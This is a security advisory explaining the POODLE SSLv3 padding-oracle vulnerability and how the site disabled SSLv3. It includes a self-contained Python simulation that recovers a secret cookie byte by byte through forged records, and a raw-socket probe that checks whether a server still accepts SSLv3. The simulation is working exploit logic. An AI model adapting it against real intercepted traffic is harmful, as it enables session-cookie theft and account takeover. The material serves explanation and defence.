POODLE: SSLv3 vulnerability (CVE-2014-3566)

What is it?

POODLE, or Padding Oracle On Downgraded Legacy Encryption, is a vulnerability in version 3 of the Secure Sockets Layer protocol (SSLv3), which is used to encrypt traffic between a browser and a web server. SSLv3's CBC cipher suites do not protect the padding added to each encrypted record, and the way a server reacts to a modified record reveals the encrypted contents one byte at a time (on average 256 attacker-triggered requests per byte). The usual target is a session cookie (a small piece of data that identifies you to an online service like your email, banking or social networking site); with the cookie, an attacker can take over your account without needing a password.

Who is vulnerable?

Only connections negotiated with SSLv3 and a CBC cipher suite can be attacked (RC4 is not affected by POODLE, although it has serious weaknesses of its own). Although SSLv3 is an old protocol, long since replaced by TLS, many browsers and web servers still support it as a fallback when a TLS connection fails (Internet Explorer 6 on Windows XP, for example, has only SSLv3 enabled by default). An attacker who can interfere with the network can exploit this fallback: by breaking the victim's TLS handshakes, they make the browser retry with SSLv3 and then conduct the POODLE attack. Browsers and servers that implement TLS_FALLBACK_SCSV (RFC 7507) can detect such a forced downgrade; disabling SSLv3 entirely removes the problem.

To exploit the vulnerability, the attacker has to control the network the user is connected to (possible on a public WiFi network, or if the attacker creates a rogue WiFi hotspot), placing themselves between the victim and the website. They also need the victim's browser to send many requests carrying the cookie, with the attacker choosing how the request is laid out; in practice this is done by injecting JavaScript into a page the victim loads over plain HTTP.
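To make the padding-oracle mechanism described above concrete, here is a simulation added to this page (it is not Hushmail's code and not taken from the POODLE paper): an SSLv3-style CBC record layer (MAC, then padding, then encryption, with only the final padding-length byte checked on receipt) together with the attacker's loop. A stand-in Feistel block cipher built from SHA-256 replaces AES/3DES so the script needs only the Python standard library; the cookie value, the fixed-character request prefix and suffix, HMAC-SHA256 as the MAC, the attacker knowing the cookie length and a fresh random IV per record are all constructed assumptions for the demonstration.

```python
import hashlib
import hmac
import os

BLOCK = 16
MAC_LEN = 32
MAC_KEY, ENC_KEY = os.urandom(32), os.urandom(32)   # session keys the attacker never learns
SECRET_COOKIE = b"s3cr3t"                            # constructed: the value the attacker wants


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in 128-bit block cipher (4-round Feistel over SHA-256) so the example needs only
# the standard library; any real block cipher in CBC mode behaves the same way here.
def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, right, rnd))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, left, rnd)), left
    return left + right


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(prev, data[i:i + BLOCK]))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        cur = data[i:i + BLOCK]
        out.append(xor(block_decrypt(key, cur), prev))
        prev = cur
    return b"".join(out)


def ssl3_seal(plaintext):
    """SSLv3 CBC record: MAC, then pad, then encrypt. The padding bytes are arbitrary;
    only the final length byte carries meaning (HMAC stands in for the SSLv3 MAC)."""
    body = plaintext + hmac.new(MAC_KEY, plaintext, hashlib.sha256).digest()
    pad_len = (BLOCK - 1) - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(ENC_KEY, iv, body)


def ssl3_open(record):
    """Receiver side: True if the record is accepted. A rejection is visible to a network
    attacker (the SSLv3 connection is torn down), and that accept/reject is the oracle."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    body = cbc_decrypt(ENC_KEY, iv, ct)
    pad_len = body[-1]
    if pad_len >= BLOCK:
        return False
    body = body[:-(pad_len + 1)]           # SSLv3 checks nothing but the length byte
    plaintext, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(MAC_KEY, plaintext, hashlib.sha256).digest())


def victim_request(prefix_len, suffix_len):
    """The victim's browser sends the cookie on every request; attacker-injected script in a
    plain-HTTP page controls the URL path length (prefix) and the body length (suffix)."""
    return ssl3_seal(b"P" * prefix_len + SECRET_COOKIE + b"S" * suffix_len)


def poodle_recover_cookie(cookie_len, max_tries=200_000):
    recovered = bytearray()
    for j in range(cookie_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK + BLOCK               # cookie byte j is last in its block
        suffix_len = -(prefix_len + cookie_len + MAC_LEN) % BLOCK  # final block is all padding
        t = (prefix_len + j) // BLOCK                              # plaintext block holding byte j
        for _ in range(max_tries):
            rec = victim_request(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] is the IV
            forged = b"".join(blocks[:-1] + [blocks[t + 1]])   # copy target block over padding block
            if ssl3_open(forged):
                # Accepted only when the decrypted last byte was BLOCK-1, i.e.
                # P_t[15] ^ C_t[15] ^ C_{n-1}[15] == 15, so solve for P_t[15].
                recovered.append((BLOCK - 1) ^ blocks[t][-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)


if __name__ == "__main__":
    print(poodle_recover_cookie(len(SECRET_COOKIE)))   # b's3cr3t'
```

Each accepted forgery leaks one byte, and the oracle accepts on average once in 256 tries, which is the figure the POODLE paper gives. TLS 1.0 and later specify the value of every padding byte and require all of them to be checked, so the same block swap is rejected there (timing side channels aside); SSLv3 cannot be patched the same way without changing the protocol, which is why the fix is to disable it.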

How did Hushmail protect against it?

We disabled SSLv3 on all our servers to prevent an SSLv3 connection in case of a TLS failure.
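One way to confirm that a server really refuses SSLv3, added here as an example and not Hushmail's own tooling: send a raw SSLv3 ClientHello over a plain socket and look at the first record that comes back. It avoids Python's `ssl` module and `openssl s_client -ssl3` because OpenSSL builds shipped with current systems usually have SSLv3 compiled out. The hostname in the usage line is a placeholder, and the constructed server responses in the tests are the three outcomes a probe can see.

```python
import os
import socket
import struct

SSL3_VERSION = b"\x03\x00"
# Cipher suites an SSLv3 client of the time would offer (CBC suites plus RC4).
CIPHER_SUITES = b"\x00\x2f\x00\x35\x00\x0a\x00\x05"  # AES128-SHA, AES256-SHA, DES-CBC3-SHA, RC4-SHA


def build_sslv3_client_hello():
    """Minimal SSLv3 ClientHello: no extensions, no session resumption."""
    body = (SSL3_VERSION                                       # client_version
            + os.urandom(32)                                   # random
            + b"\x00"                                          # empty session_id
            + struct.pack("!H", len(CIPHER_SUITES)) + CIPHER_SUITES
            + b"\x01\x00")                                     # one compression method: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # HandshakeType client_hello
    return b"\x16" + SSL3_VERSION + struct.pack("!H", len(handshake)) + handshake  # record header


def classify_response(data):
    """Interpret the first record the server sent back (or an empty read)."""
    if not data:
        return "closed"                    # connection dropped with no reply: SSLv3 refused
    content_type = data[0]
    if content_type == 0x15 and len(data) >= 7:
        return f"alert({data[6]})"         # 70 = protocol_version, 40 = handshake_failure
    if content_type == 0x16 and len(data) >= 11 and data[5] == 0x02:
        version = data[9:11]               # server_version inside the ServerHello body
        return "sslv3-accepted" if version == SSL3_VERSION else f"negotiated-{version.hex()}"
    return "unexpected"


def probe_sslv3(host, port=443, timeout=5.0):
    """What the server does with an SSLv3 ClientHello. Anything other than
    'sslv3-accepted' means a POODLE downgrade cannot land on this server."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except (socket.timeout, ConnectionResetError):
            data = b""
    return classify_response(data)


if __name__ == "__main__":
    print(probe_sslv3("example.com"))   # hostname is a placeholder
```

A server that has SSLv3 disabled answers with an alert (OpenSSL sends protocol_version, 70) or simply closes the connection; "sslv3-accepted" is the result that needs fixing. Run the probe against every hostname and port that terminates TLS, since SSLv3 is configured per listener.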

Resources:

https://www.openssl.org/~bodo/ssl-poodle.pdf

http://www.networkworld.com/article/2833937/security/security-experts-warn-of-poodle-attack-against-ssl-30.html

http://www.wired.com/2014/10/poodle-explained/